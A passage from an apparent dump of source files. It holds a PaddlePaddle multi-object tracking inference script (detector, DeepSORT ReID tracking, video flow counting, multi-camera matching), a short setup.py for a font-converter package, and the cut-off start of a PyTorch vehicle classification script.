enable_mkldnn=enable_mkldnn)\n 
assert batch_size == 1, \"The detector of tracking models only supports batch_size=1 now\"\n self.pred_config = pred_config\n\n def postprocess(self,\n boxes,\n ori_image_shape,\n threshold,\n inputs,\n scaled=False):\n over_thres_idx = np.nonzero(boxes[:, 1:2] >= threshold)[0]\n if len(over_thres_idx) == 0:\n pred_dets = np.zeros((1, 6), dtype=np.float32)\n pred_xyxys = np.zeros((1, 4), dtype=np.float32)\n return pred_dets, pred_xyxys\n else:\n boxes = boxes[over_thres_idx]\n\n if not scaled:\n # scaled means whether the coords after detector outputs\n # have been scaled back to the original image, set True \n # in general detector, set False in JDE YOLOv3.\n input_shape = inputs['image'].shape[2:]\n im_shape = inputs['im_shape'][0]\n scale_factor = inputs['scale_factor'][0]\n pred_bboxes = scale_coords(boxes[:, 2:], input_shape, im_shape,\n scale_factor)\n else:\n pred_bboxes = boxes[:, 2:]\n\n pred_xyxys, keep_idx = clip_box(pred_bboxes, ori_image_shape)\n\n if len(keep_idx[0]) == 0:\n pred_dets = np.zeros((1, 6), dtype=np.float32)\n pred_xyxys = np.zeros((1, 4), dtype=np.float32)\n return pred_dets, pred_xyxys\n\n pred_scores = boxes[:, 1:2][keep_idx[0]]\n pred_cls_ids = boxes[:, 0:1][keep_idx[0]]\n pred_tlwhs = np.concatenate(\n (pred_xyxys[:, 0:2], pred_xyxys[:, 2:4] - pred_xyxys[:, 0:2] + 1),\n axis=1)\n\n pred_dets = np.concatenate(\n (pred_tlwhs, pred_scores, pred_cls_ids), axis=1)\n\n return pred_dets, pred_xyxys\n\n def predict(self,\n image_path,\n ori_image_shape,\n threshold=0.5,\n scaled=False,\n repeats=1,\n add_timer=True):\n '''\n Args:\n image_path (list[str]): path of images, only support one image path\n (batch_size=1) in tracking model\n ori_image_shape (list[int]: original image shape\n threshold (float): threshold of predicted box' score\n scaled (bool): whether the coords after detector outputs are scaled,\n default False in jde yolov3, set True in general detector.\n repeats (int): repeat number for prediction\n add_timer (bool): whether add timer during prediction\n \n Returns:\n pred_dets (np.ndarray, [N, 6]): 'x,y,w,h,score,cls_id'\n pred_xyxys (np.ndarray, [N, 4]): 'x1,y1,x2,y2'\n '''\n # preprocess\n if add_timer:\n self.det_times.preprocess_time_s.start()\n inputs = self.preprocess(image_path)\n\n input_names = self.predictor.get_input_names()\n for i in range(len(input_names)):\n input_tensor = self.predictor.get_input_handle(input_names[i])\n input_tensor.copy_from_cpu(inputs[input_names[i]])\n if add_timer:\n self.det_times.preprocess_time_s.end()\n self.det_times.inference_time_s.start()\n\n # model prediction\n for i in range(repeats):\n self.predictor.run()\n output_names = self.predictor.get_output_names()\n boxes_tensor = self.predictor.get_output_handle(output_names[0])\n boxes = boxes_tensor.copy_to_cpu()\n if add_timer:\n self.det_times.inference_time_s.end(repeats=repeats)\n self.det_times.postprocess_time_s.start()\n\n # postprocess\n if len(boxes) == 0:\n pred_dets = np.zeros((1, 6), dtype=np.float32)\n pred_xyxys = np.zeros((1, 4), dtype=np.float32)\n else:\n pred_dets, pred_xyxys = self.postprocess(\n boxes, ori_image_shape, threshold, inputs, scaled=scaled)\n if add_timer:\n self.det_times.postprocess_time_s.end()\n self.det_times.img_num += 1\n return pred_dets, pred_xyxys\n\n\nclass SDE_DetectorPicoDet(DetectorPicoDet):\n \"\"\"\n PicoDet of SDE methods, the postprocess of PicoDet has not been exported as\n other detectors, so do postprocess here.\n\n Args:\n pred_config (object): config of model, defined by `Config(model_dir)`\n model_dir 
(str): root path of model.pdiparams, model.pdmodel and infer_cfg.yml\n device (str): Choose the device you want to run, it can be: CPU/GPU/XPU, default is CPU\n run_mode (str): mode of running(fluid/trt_fp32/trt_fp16)\n batch_size (int): size of per batch in inference, default is 1 in tracking models\n trt_min_shape (int): min shape for dynamic shape in trt\n trt_max_shape (int): max shape for dynamic shape in trt\n trt_opt_shape (int): opt shape for dynamic shape in trt\n trt_calib_mode (bool): If the model is produced by TRT offline quantitative\n calibration, trt_calib_mode need to set True\n cpu_threads (int): cpu threads\n enable_mkldnn (bool): whether to open MKLDNN\n \"\"\"\n\n def __init__(self,\n pred_config,\n model_dir,\n device='CPU',\n run_mode='fluid',\n batch_size=1,\n trt_min_shape=1,\n trt_max_shape=1088,\n trt_opt_shape=608,\n trt_calib_mode=False,\n cpu_threads=1,\n enable_mkldnn=False):\n super(SDE_DetectorPicoDet, self).__init__(\n pred_config=pred_config,\n model_dir=model_dir,\n device=device,\n run_mode=run_mode,\n batch_size=batch_size,\n trt_min_shape=trt_min_shape,\n trt_max_shape=trt_max_shape,\n trt_opt_shape=trt_opt_shape,\n trt_calib_mode=trt_calib_mode,\n cpu_threads=cpu_threads,\n enable_mkldnn=enable_mkldnn)\n assert batch_size == 1, \"The detector of tracking models only supports batch_size=1 now\"\n self.pred_config = pred_config\n\n def postprocess(self, boxes, ori_image_shape, threshold):\n over_thres_idx = np.nonzero(boxes[:, 1:2] >= threshold)[0]\n if len(over_thres_idx) == 0:\n pred_dets = np.zeros((1, 6), dtype=np.float32)\n pred_xyxys = np.zeros((1, 4), dtype=np.float32)\n return pred_dets, pred_xyxys\n else:\n boxes = boxes[over_thres_idx]\n\n pred_bboxes = boxes[:, 2:]\n\n pred_xyxys, keep_idx = clip_box(pred_bboxes, ori_image_shape)\n if len(keep_idx[0]) == 0:\n pred_dets = np.zeros((1, 6), dtype=np.float32)\n pred_xyxys = np.zeros((1, 4), dtype=np.float32)\n return pred_dets, pred_xyxys\n\n pred_scores = boxes[:, 1:2][keep_idx[0]]\n pred_cls_ids = boxes[:, 0:1][keep_idx[0]]\n pred_tlwhs = np.concatenate(\n (pred_xyxys[:, 0:2], pred_xyxys[:, 2:4] - pred_xyxys[:, 0:2] + 1),\n axis=1)\n\n pred_dets = np.concatenate(\n (pred_tlwhs, pred_scores, pred_cls_ids), axis=1)\n\n return pred_dets, pred_xyxys\n\n def predict(self,\n image_path,\n ori_image_shape,\n threshold=0.5,\n scaled=False,\n repeats=1,\n add_timer=True):\n '''\n Args:\n image_path (list[str]): path of images, only support one image path\n (batch_size=1) in tracking model\n ori_image_shape (list[int]: original image shape\n threshold (float): threshold of predicted box' score\n scaled (bool): whether the coords after detector outputs are scaled,\n default False in jde yolov3, set True in general detector.\n repeats (int): repeat number for prediction\n add_timer (bool): whether add timer during prediction\n Returns:\n pred_dets (np.ndarray, [N, 6]): 'x,y,w,h,score,cls_id'\n pred_xyxys (np.ndarray, [N, 4]): 'x1,y1,x2,y2'\n '''\n # preprocess\n if add_timer:\n self.det_times.preprocess_time_s.start()\n inputs = self.preprocess(image_path)\n\n input_names = self.predictor.get_input_names()\n for i in range(len(input_names)):\n input_tensor = self.predictor.get_input_handle(input_names[i])\n input_tensor.copy_from_cpu(inputs[input_names[i]])\n if add_timer:\n self.det_times.preprocess_time_s.end()\n self.det_times.inference_time_s.start()\n\n # model prediction\n for i in range(repeats):\n self.predictor.run()\n np_score_list.clear()\n np_boxes_list.clear()\n output_names = 
self.predictor.get_output_names()\n num_outs = int(len(output_names) / 2)\n for out_idx in range(num_outs):\n np_score_list.append(\n self.predictor.get_output_handle(output_names[out_idx])\n .copy_to_cpu())\n np_boxes_list.append(\n self.predictor.get_output_handle(output_names[\n out_idx + num_outs]).copy_to_cpu())\n if add_timer:\n self.det_times.inference_time_s.end(repeats=repeats)\n self.det_times.postprocess_time_s.start()\n\n # postprocess\n self.picodet_postprocess = PicoDetPostProcess(\n inputs['image'].shape[2:],\n inputs['im_shape'],\n inputs['scale_factor'],\n strides=self.pred_config.fpn_stride,\n nms_threshold=self.pred_config.nms['nms_threshold'])\n boxes, boxes_num = self.picodet_postprocess(np_score_list,\n np_boxes_list)\n\n if len(boxes) == 0:\n pred_dets = np.zeros((1, 6), dtype=np.float32)\n pred_xyxys = np.zeros((1, 4), dtype=np.float32)\n else:\n pred_dets, pred_xyxys = self.postprocess(boxes, ori_image_shape,\n threshold)\n if add_timer:\n self.det_times.postprocess_time_s.end()\n self.det_times.img_num += 1\n\n return pred_dets, pred_xyxys\n\n\nclass SDE_ReID(object):\n \"\"\"\n ReID of SDE methods\n\n Args:\n pred_config (object): config of model, defined by `Config(model_dir)`\n model_dir (str): root path of model.pdiparams, model.pdmodel and infer_cfg.yml\n device (str): Choose the device you want to run, it can be: CPU/GPU/XPU, default is CPU\n run_mode (str): mode of running(fluid/trt_fp32/trt_fp16)\n batch_size (int): size of per batch in inference, default 50 means at most\n 50 sub images can be made a batch and send into ReID model\n trt_min_shape (int): min shape for dynamic shape in trt\n trt_max_shape (int): max shape for dynamic shape in trt\n trt_opt_shape (int): opt shape for dynamic shape in trt\n trt_calib_mode (bool): If the model is produced by TRT offline quantitative\n calibration, trt_calib_mode need to set True\n cpu_threads (int): cpu threads\n enable_mkldnn (bool): whether to open MKLDNN\n \"\"\"\n\n def __init__(self,\n pred_config,\n model_dir,\n device='CPU',\n run_mode='fluid',\n batch_size=50,\n trt_min_shape=1,\n trt_max_shape=1088,\n trt_opt_shape=608,\n trt_calib_mode=False,\n cpu_threads=1,\n enable_mkldnn=False):\n self.pred_config = pred_config\n self.predictor, self.config = load_predictor(\n model_dir,\n run_mode=run_mode,\n batch_size=batch_size,\n min_subgraph_size=self.pred_config.min_subgraph_size,\n device=device,\n use_dynamic_shape=self.pred_config.use_dynamic_shape,\n trt_min_shape=trt_min_shape,\n trt_max_shape=trt_max_shape,\n trt_opt_shape=trt_opt_shape,\n trt_calib_mode=trt_calib_mode,\n cpu_threads=cpu_threads,\n enable_mkldnn=enable_mkldnn)\n self.det_times = Timer()\n self.cpu_mem, self.gpu_mem, self.gpu_util = 0, 0, 0\n self.batch_size = batch_size\n assert pred_config.tracker, \"Tracking model should have tracker\"\n pt = pred_config.tracker\n max_age = pt['max_age'] if 'max_age' in pt else 30\n max_iou_distance = pt[\n 'max_iou_distance'] if 'max_iou_distance' in pt else 0.7\n self.tracker = DeepSORTTracker(\n max_age=max_age, max_iou_distance=max_iou_distance)\n\n def get_crops(self, xyxy, ori_img):\n w, h = self.tracker.input_size\n self.det_times.preprocess_time_s.start()\n crops = []\n xyxy = xyxy.astype(np.int64)\n ori_img = ori_img.transpose(1, 0, 2) # [h,w,3]->[w,h,3]\n for i, bbox in enumerate(xyxy):\n crop = ori_img[bbox[0]:bbox[2], bbox[1]:bbox[3], :]\n crops.append(crop)\n crops = preprocess_reid(crops, w, h)\n self.det_times.preprocess_time_s.end()\n\n return crops\n\n def preprocess(self, 
crops):\n # to keep fast speed, only use topk crops\n crops = crops[:self.batch_size]\n inputs = {}\n inputs['crops'] = np.array(crops).astype('float32')\n return inputs\n\n def postprocess(self, pred_dets, pred_embs):\n tracker = self.tracker\n tracker.predict()\n online_targets = tracker.update(pred_dets, pred_embs)\n\n online_tlwhs, online_scores, online_ids = [], [], []\n for t in online_targets:\n if not t.is_confirmed() or t.time_since_update > 1:\n continue\n tlwh = t.to_tlwh()\n tscore = t.score\n tid = t.track_id\n if tlwh[2] * tlwh[3] <= tracker.min_box_area:\n continue\n if tracker.vertical_ratio > 0 and tlwh[2] / tlwh[\n 3] > tracker.vertical_ratio:\n continue\n online_tlwhs.append(tlwh)\n online_scores.append(tscore)\n online_ids.append(tid)\n\n tracking_outs = {\n 'online_tlwhs': online_tlwhs,\n 'online_scores': online_scores,\n 'online_ids': online_ids,\n }\n return tracking_outs\n\n def postprocess_mtmct(self, pred_dets, pred_embs, frame_id, seq_name):\n tracker = self.tracker\n tracker.predict()\n online_targets = tracker.update(pred_dets, pred_embs)\n\n online_tlwhs, online_scores, online_ids = [], [], []\n online_tlbrs, online_feats = [], []\n for t in online_targets:\n if not t.is_confirmed() or t.time_since_update > 1:\n continue\n tlwh = t.to_tlwh()\n tscore = t.score\n tid = t.track_id\n if tlwh[2] * tlwh[3] <= tracker.min_box_area:\n continue\n if tracker.vertical_ratio > 0 and tlwh[2] / tlwh[\n 3] > tracker.vertical_ratio:\n continue\n online_tlwhs.append(tlwh)\n online_scores.append(tscore)\n online_ids.append(tid)\n\n online_tlbrs.append(t.to_tlbr())\n online_feats.append(t.feat)\n\n tracking_outs = {\n 'online_tlwhs': online_tlwhs,\n 'online_scores': online_scores,\n 'online_ids': online_ids,\n 'feat_data': {},\n }\n for _tlbr, _id, _feat in zip(online_tlbrs, online_ids, online_feats):\n feat_data = {}\n feat_data['bbox'] = _tlbr\n feat_data['frame'] = f\"{frame_id:06d}\"\n feat_data['id'] = _id\n _imgname = f'{seq_name}_{_id}_{frame_id}.jpg'\n feat_data['imgname'] = _imgname\n feat_data['feat'] = _feat\n tracking_outs['feat_data'].update({_imgname: feat_data})\n return tracking_outs\n\n def predict(self,\n crops,\n pred_dets,\n repeats=1,\n add_timer=True,\n MTMCT=False,\n frame_id=0,\n seq_name=''):\n # preprocess\n if add_timer:\n self.det_times.preprocess_time_s.start()\n inputs = self.preprocess(crops)\n input_names = self.predictor.get_input_names()\n for i in range(len(input_names)):\n input_tensor = self.predictor.get_input_handle(input_names[i])\n input_tensor.copy_from_cpu(inputs[input_names[i]])\n\n if add_timer:\n self.det_times.preprocess_time_s.end()\n self.det_times.inference_time_s.start()\n\n # model prediction\n for i in range(repeats):\n self.predictor.run()\n output_names = self.predictor.get_output_names()\n feature_tensor = self.predictor.get_output_handle(output_names[0])\n pred_embs = feature_tensor.copy_to_cpu()\n if add_timer:\n self.det_times.inference_time_s.end(repeats=repeats)\n self.det_times.postprocess_time_s.start()\n\n # postprocess\n if MTMCT == False:\n tracking_outs = self.postprocess(pred_dets, pred_embs)\n else:\n tracking_outs = self.postprocess_mtmct(pred_dets, pred_embs,\n frame_id, seq_name)\n if add_timer:\n self.det_times.postprocess_time_s.end()\n self.det_times.img_num += 1\n\n return tracking_outs\n\n\ndef predict_image(detector, reid_model, image_list):\n image_list.sort()\n for i, img_file in enumerate(image_list):\n frame = cv2.imread(img_file)\n ori_image_shape = list(frame.shape[:2])\n if 
FLAGS.run_benchmark:\n # warmup\n pred_dets, pred_xyxys = detector.predict(\n [img_file],\n ori_image_shape,\n FLAGS.threshold,\n FLAGS.scaled,\n repeats=10,\n add_timer=False)\n # run benchmark\n pred_dets, pred_xyxys = detector.predict(\n [img_file],\n ori_image_shape,\n FLAGS.threshold,\n FLAGS.scaled,\n repeats=10,\n add_timer=True)\n\n cm, gm, gu = get_current_memory_mb()\n detector.cpu_mem += cm\n detector.gpu_mem += gm\n detector.gpu_util += gu\n print('Test iter {}, file name:{}'.format(i, img_file))\n else:\n pred_dets, pred_xyxys = detector.predict(\n [img_file], ori_image_shape, FLAGS.threshold, FLAGS.scaled)\n\n if len(pred_dets) == 1 and np.sum(pred_dets) == 0:\n print('Frame {} has no object, try to modify score threshold.'.\n format(i))\n online_im = frame\n else:\n # reid process\n crops = reid_model.get_crops(pred_xyxys, frame)\n\n if FLAGS.run_benchmark:\n # warmup\n tracking_outs = reid_model.predict(\n crops, pred_dets, repeats=10, add_timer=False)\n # run benchmark \n tracking_outs = reid_model.predict(\n crops, pred_dets, repeats=10, add_timer=True)\n\n else:\n tracking_outs = reid_model.predict(crops, pred_dets)\n\n online_tlwhs = tracking_outs['online_tlwhs']\n online_scores = tracking_outs['online_scores']\n online_ids = tracking_outs['online_ids']\n\n online_im = plot_tracking(\n frame, online_tlwhs, online_ids, online_scores, frame_id=i)\n\n if FLAGS.save_images:\n if not os.path.exists(FLAGS.output_dir):\n os.makedirs(FLAGS.output_dir)\n img_name = os.path.split(img_file)[-1]\n out_path = os.path.join(FLAGS.output_dir, img_name)\n cv2.imwrite(out_path, online_im)\n print(\"save result to: \" + out_path)\n\n\ndef predict_video(detector, reid_model, camera_id):\n if camera_id != -1:\n capture = cv2.VideoCapture(camera_id)\n video_name = 'mot_output.mp4'\n else:\n capture = cv2.VideoCapture(FLAGS.video_file)\n video_name = os.path.split(FLAGS.video_file)[-1]\n # Get Video info : resolution, fps, frame count\n width = int(capture.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT))\n fps = int(capture.get(cv2.CAP_PROP_FPS))\n frame_count = int(capture.get(cv2.CAP_PROP_FRAME_COUNT))\n print(\"fps: %d, frame_count: %d\" % (fps, frame_count))\n\n if not os.path.exists(FLAGS.output_dir):\n os.makedirs(FLAGS.output_dir)\n out_path = os.path.join(FLAGS.output_dir, video_name)\n if not FLAGS.save_images:\n video_format = 'mp4v'\n fourcc = cv2.VideoWriter_fourcc(*video_format)\n writer = cv2.VideoWriter(out_path, fourcc, fps, (width, height))\n frame_id = 0\n timer = MOTTimer()\n results = defaultdict(list)\n id_set = set()\n interval_id_set = set()\n in_id_list = list()\n out_id_list = list()\n prev_center = dict()\n records = list()\n entrance = [0, height / 2., width, height / 2.]\n video_fps = fps\n\n while (1):\n ret, frame = capture.read()\n if not ret:\n break\n timer.tic()\n ori_image_shape = list(frame.shape[:2])\n pred_dets, pred_xyxys = detector.predict([frame], ori_image_shape,\n FLAGS.threshold, FLAGS.scaled)\n\n if len(pred_dets) == 1 and np.sum(pred_dets) == 0:\n print('Frame {} has no object, try to modify score threshold.'.\n format(frame_id))\n timer.toc()\n im = frame\n else:\n # reid process\n crops = reid_model.get_crops(pred_xyxys, frame)\n tracking_outs = reid_model.predict(crops, pred_dets)\n\n online_tlwhs = tracking_outs['online_tlwhs']\n online_scores = tracking_outs['online_scores']\n online_ids = tracking_outs['online_ids']\n\n results[0].append(\n (frame_id + 1, online_tlwhs, online_scores, online_ids))\n # 
NOTE: just implement flow statistic for one class\n result = (frame_id + 1, online_tlwhs, online_scores, online_ids)\n statistic = flow_statistic(\n result, FLAGS.secs_interval, FLAGS.do_entrance_counting,\n video_fps, entrance, id_set, interval_id_set, in_id_list,\n out_id_list, prev_center, records)\n id_set = statistic['id_set']\n interval_id_set = statistic['interval_id_set']\n in_id_list = statistic['in_id_list']\n out_id_list = statistic['out_id_list']\n prev_center = statistic['prev_center']\n records = statistic['records']\n\n timer.toc()\n\n fps = 1. / timer.duration\n im = plot_tracking(\n frame,\n online_tlwhs,\n online_ids,\n online_scores,\n frame_id=frame_id,\n fps=fps,\n do_entrance_counting=FLAGS.do_entrance_counting,\n entrance=entrance)\n\n if FLAGS.save_images:\n save_dir = os.path.join(FLAGS.output_dir, video_name.split('.')[-2])\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n cv2.imwrite(\n os.path.join(save_dir, '{:05d}.jpg'.format(frame_id)), im)\n else:\n writer.write(im)\n\n frame_id += 1\n print('detect frame:%d, fps: %f' % (frame_id, fps))\n\n if camera_id != -1:\n cv2.imshow('Tracking Detection', im)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n if FLAGS.save_mot_txts:\n result_filename = os.path.join(FLAGS.output_dir,\n video_name.split('.')[-2] + '.txt')\n write_mot_results(result_filename, results)\n\n result_filename = os.path.join(\n FLAGS.output_dir, video_name.split('.')[-2] + '_flow_statistic.txt')\n f = open(result_filename, 'w')\n for line in records:\n f.write(line)\n print('Flow statistic save in {}'.format(result_filename))\n f.close()\n\n if FLAGS.save_images:\n save_dir = os.path.join(FLAGS.output_dir, video_name.split('.')[-2])\n cmd_str = 'ffmpeg -f image2 -i {}/%05d.jpg {}'.format(save_dir,\n out_path)\n os.system(cmd_str)\n print('Save video in {}.'.format(out_path))\n else:\n writer.release()\n\n\ndef predict_mtmct_seq(detector, reid_model, seq_name, output_dir):\n fpath = os.path.join(FLAGS.mtmct_dir, seq_name)\n if os.path.exists(os.path.join(fpath, 'img1')):\n fpath = os.path.join(fpath, 'img1')\n\n assert os.path.isdir(fpath), '{} should be a directory'.format(fpath)\n image_list = os.listdir(fpath)\n image_list.sort()\n assert len(image_list) > 0, '{} has no images.'.format(fpath)\n\n results = defaultdict(list)\n mot_features_dict = {} # cid_tid_fid feats\n print('Totally {} frames found in seq {}.'.format(\n len(image_list), seq_name))\n\n for frame_id, img_file in enumerate(image_list):\n if frame_id % 40 == 0:\n print('Processing frame {} of seq {}.'.format(frame_id, seq_name))\n frame = cv2.imread(os.path.join(fpath, img_file))\n ori_image_shape = list(frame.shape[:2])\n frame_path = os.path.join(fpath, img_file)\n pred_dets, pred_xyxys = detector.predict([frame_path], ori_image_shape,\n FLAGS.threshold, FLAGS.scaled)\n\n if len(pred_dets) == 1 and np.sum(pred_dets) == 0:\n print('Frame {} has no object, try to modify score threshold.'.\n format(frame_id))\n online_im = frame\n else:\n # reid process\n crops = reid_model.get_crops(pred_xyxys, frame)\n\n tracking_outs = reid_model.predict(\n crops,\n pred_dets,\n MTMCT=True,\n frame_id=frame_id,\n seq_name=seq_name)\n\n feat_data_dict = tracking_outs['feat_data']\n mot_features_dict = dict(mot_features_dict, **feat_data_dict)\n\n online_tlwhs = tracking_outs['online_tlwhs']\n online_scores = tracking_outs['online_scores']\n online_ids = tracking_outs['online_ids']\n\n online_im = plot_tracking(frame, online_tlwhs, online_ids,\n online_scores, frame_id)\n 
results[0].append(\n (frame_id + 1, online_tlwhs, online_scores, online_ids))\n\n if FLAGS.save_images:\n save_dir = os.path.join(output_dir, seq_name)\n if not os.path.exists(save_dir): os.makedirs(save_dir)\n img_name = os.path.split(img_file)[-1]\n out_path = os.path.join(save_dir, img_name)\n cv2.imwrite(out_path, online_im)\n\n if FLAGS.save_mot_txts:\n result_filename = os.path.join(output_dir, seq_name + '.txt')\n write_mot_results(result_filename, results)\n\n return mot_features_dict\n\n\ndef predict_mtmct(detector, reid_model, mtmct_dir, mtmct_cfg):\n MTMCT = mtmct_cfg['MTMCT']\n assert MTMCT == True, 'predict_mtmct should be used for MTMCT.'\n\n cameras_bias = mtmct_cfg['cameras_bias']\n cid_bias = parse_bias(cameras_bias)\n scene_cluster = list(cid_bias.keys())\n\n # 1.zone releated parameters\n use_zone = mtmct_cfg['use_zone']\n zone_path = mtmct_cfg['zone_path']\n\n # 2.tricks parameters, can be used for other mtmct dataset\n use_ff = mtmct_cfg['use_ff']\n use_rerank = mtmct_cfg['use_rerank']\n\n # 3.camera releated parameters\n use_camera = mtmct_cfg['use_camera']\n use_st_filter = mtmct_cfg['use_st_filter']\n\n # 4.zone releated parameters\n use_roi = mtmct_cfg['use_roi']\n roi_dir = mtmct_cfg['roi_dir']\n\n mot_list_breaks = []\n cid_tid_dict = dict()\n\n output_dir = FLAGS.output_dir\n if not os.path.exists(output_dir): os.makedirs(output_dir)\n\n seqs = os.listdir(mtmct_dir)\n seqs.sort()\n\n for seq in seqs:\n fpath = os.path.join(mtmct_dir, seq)\n if os.path.isfile(fpath) and _is_valid_video(fpath):\n ext = seq.split('.')[-1]\n seq = seq.split('.')[-2]\n print('ffmpeg processing of video {}'.format(fpath))\n frames_path = video2frames(\n video_path=fpath, outpath=mtmct_dir, frame_rate=25)\n fpath = os.path.join(mtmct_dir, seq)\n\n if os.path.isdir(fpath) == False:\n print('{} is not a image folder.'.format(fpath))\n continue\n\n mot_features_dict = predict_mtmct_seq(detector, reid_model, seq,\n output_dir)\n\n cid = int(re.sub('[a-z,A-Z]', \"\", seq))\n tid_data, mot_list_break = trajectory_fusion(\n mot_features_dict,\n cid,\n cid_bias,\n use_zone=use_zone,\n zone_path=zone_path)\n mot_list_breaks.append(mot_list_break)\n # single seq process\n for line in tid_data:\n tracklet = tid_data[line]\n tid = tracklet['tid']\n if (cid, tid) not in cid_tid_dict:\n cid_tid_dict[(cid, tid)] = tracklet\n\n map_tid = sub_cluster(\n cid_tid_dict,\n scene_cluster,\n use_ff=use_ff,\n use_rerank=use_rerank,\n use_camera=use_camera,\n use_st_filter=use_st_filter)\n\n pred_mtmct_file = os.path.join(output_dir, 'mtmct_result.txt')\n if use_camera:\n gen_res(pred_mtmct_file, scene_cluster, map_tid, mot_list_breaks)\n else:\n gen_res(\n pred_mtmct_file,\n scene_cluster,\n map_tid,\n mot_list_breaks,\n use_roi=use_roi,\n roi_dir=roi_dir)\n\n if FLAGS.save_images:\n camera_results, cid_tid_fid_res = get_mtmct_matching_results(\n pred_mtmct_file)\n\n crops_dir = os.path.join(output_dir, 'mtmct_crops')\n save_mtmct_crops(\n cid_tid_fid_res, images_dir=mtmct_dir, crops_dir=crops_dir)\n\n save_dir = os.path.join(output_dir, 'mtmct_vis')\n save_mtmct_vis_results(\n camera_results,\n images_dir=mtmct_dir,\n save_dir=save_dir,\n save_videos=FLAGS.save_images)\n\n # evalution metrics\n data_root_gt = os.path.join(mtmct_dir, '..', 'gt', 'gt.txt')\n if os.path.exists(data_root_gt):\n print_mtmct_result(data_root_gt, pred_mtmct_file)\n\n\ndef main():\n pred_config = PredictConfig(FLAGS.model_dir)\n detector_func = 'SDE_Detector'\n if pred_config.arch == 'PicoDet':\n detector_func = 
'SDE_DetectorPicoDet'\n\n detector = eval(detector_func)(pred_config,\n FLAGS.model_dir,\n device=FLAGS.device,\n run_mode=FLAGS.run_mode,\n batch_size=FLAGS.batch_size,\n trt_min_shape=FLAGS.trt_min_shape,\n trt_max_shape=FLAGS.trt_max_shape,\n trt_opt_shape=FLAGS.trt_opt_shape,\n trt_calib_mode=FLAGS.trt_calib_mode,\n cpu_threads=FLAGS.cpu_threads,\n enable_mkldnn=FLAGS.enable_mkldnn)\n\n pred_config = PredictConfig(FLAGS.reid_model_dir)\n reid_model = SDE_ReID(\n pred_config,\n FLAGS.reid_model_dir,\n device=FLAGS.device,\n run_mode=FLAGS.run_mode,\n batch_size=FLAGS.reid_batch_size,\n trt_min_shape=FLAGS.trt_min_shape,\n trt_max_shape=FLAGS.trt_max_shape,\n trt_opt_shape=FLAGS.trt_opt_shape,\n trt_calib_mode=FLAGS.trt_calib_mode,\n cpu_threads=FLAGS.cpu_threads,\n enable_mkldnn=FLAGS.enable_mkldnn)\n\n # predict from video file or camera video stream\n if FLAGS.video_file is not None or FLAGS.camera_id != -1:\n predict_video(detector, reid_model, FLAGS.camera_id)\n\n elif FLAGS.mtmct_dir is not None:\n mtmct_cfg_file = FLAGS.mtmct_cfg\n with open(mtmct_cfg_file) as f:\n mtmct_cfg = yaml.safe_load(f)\n predict_mtmct(detector, reid_model, FLAGS.mtmct_dir, mtmct_cfg)\n\n else:\n # predict from image\n img_list = get_test_images(FLAGS.image_dir, FLAGS.image_file)\n predict_image(detector, reid_model, img_list)\n\n if not FLAGS.run_benchmark:\n detector.det_times.info(average=True)\n reid_model.det_times.info(average=True)\n else:\n mode = FLAGS.run_mode\n det_model_dir = FLAGS.model_dir\n det_model_info = {\n 'model_name': det_model_dir.strip('/').split('/')[-1],\n 'precision': mode.split('_')[-1]\n }\n bench_log(detector, img_list, det_model_info, name='Det')\n\n reid_model_dir = FLAGS.reid_model_dir\n reid_model_info = {\n 'model_name': reid_model_dir.strip('/').split('/')[-1],\n 'precision': mode.split('_')[-1]\n }\n bench_log(reid_model, img_list, reid_model_info, name='ReID')\n\n\nif __name__ == '__main__':\n paddle.enable_static()\n parser = argsparser()\n FLAGS = parser.parse_args()\n print_arguments(FLAGS)\n FLAGS.device = FLAGS.device.upper()\n assert FLAGS.device in ['CPU', 'GPU', 'XPU'\n ], \"device should be CPU, GPU or XPU\"\n\n main()\n"} {"ext": "py", "sha": "1a311118f207b109f72b04552b596740dc758fae", "content": "#!usr/bin/env python3\n# -*- coding:utf-8 _*-\n\n\nfrom setuptools import setup\n\nsetup(name='font-converter',\n version='0.1',\n description='A font converter script',\n url='http://github.com/5uw1st/font-converter',\n author='5uw1st',\n author_email='j5uw1st@gmail.com',\n license='MIT',\n packages=['font_converter'],\n python_requires=\">=3.6\",\n install_requires=[\n 'requests==2.20.1',\n 'redis==3.3.8',\n 'pytesseract==0.3.0',\n 'Pillow==6.1.0',\n ],\n zip_safe=False)\n"} {"ext": "py", "sha": "1a3111bea352c6ee26d9cdeef4033302e248a38e", "content": "# coding: utf-8\r\n\r\nimport os\r\nimport sys\r\nimport re\r\nimport time\r\nimport pickle\r\nimport shutil\r\nimport random\r\nimport argparse\r\n\r\nfrom darknet_util import *\r\nfrom darknet import Darknet\r\nfrom preprocess import prep_image, process_img, inp_to_image\r\nfrom dataset import color_attrs, direction_attrs, type_attrs\r\n\r\nimport torch\r\nimport torchvision\r\nimport paramiko\r\nimport cv2\r\nimport numpy as np\r\nimport PIL\r\nfrom PIL import Image\r\nfrom matplotlib import pyplot as plt\r\nfrom matplotlib.widgets import Cursor\r\nfrom matplotlib.image import AxesImage\r\nfrom scipy.spatial.distance import cityblock\r\nfrom tqdm import tqdm\r\n\r\n# -------------------------------------\r\n# for 
matplotlib to display Chinese characters correctly\r\nfrom pylab import *\r\nmpl.rcParams['font.sans-serif'] = ['SimHei']\r\n\r\nuse_cuda = True # True\r\nos.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'\r\nos.environ['CUDA_VISIBLE_DEVICES'] = '0'\r\ndevice = torch.device(\r\n 'cuda: 0' if torch.cuda.is_available() and use_cuda else 'cpu')\r\n\r\nif use_cuda:\r\n torch.manual_seed(0)\r\n torch.cuda.manual_seed_all(0)\r\nprint('=> device: ', device)\r\n\r\nlocal_model_path = './checkpoints/epoch_39.pth'\r\nlocal_car_cfg_path = './car.cfg'\r\nlocal_car_det_weights_path = './car_detect.weights'\r\n\r\n\r\n\r\nclass Cls_Net(torch.nn.Module):\r\n \"\"\"\r\n vehicle multilabel classification model\r\n \"\"\"\r\n\r\n def __init__(self, num_cls, input_size):\r\n \"\"\"\r\n network definition\r\n :param is_freeze:\r\n \"\"\"\r\n torch.nn.Module.__init__(self)\r\n\r\n # output channels\r\n self._num_cls = num_cls\r\n\r\n # input image size\r\n self.input_size = input_size\r\n\r\n # delete original FC and add custom FC\r\n self.features = torchvision.models.resnet18(pretrained=True)\r\n del self.features.fc\r\n # print('feature extractor:\\n', self.features)\r\n\r\n self.features = 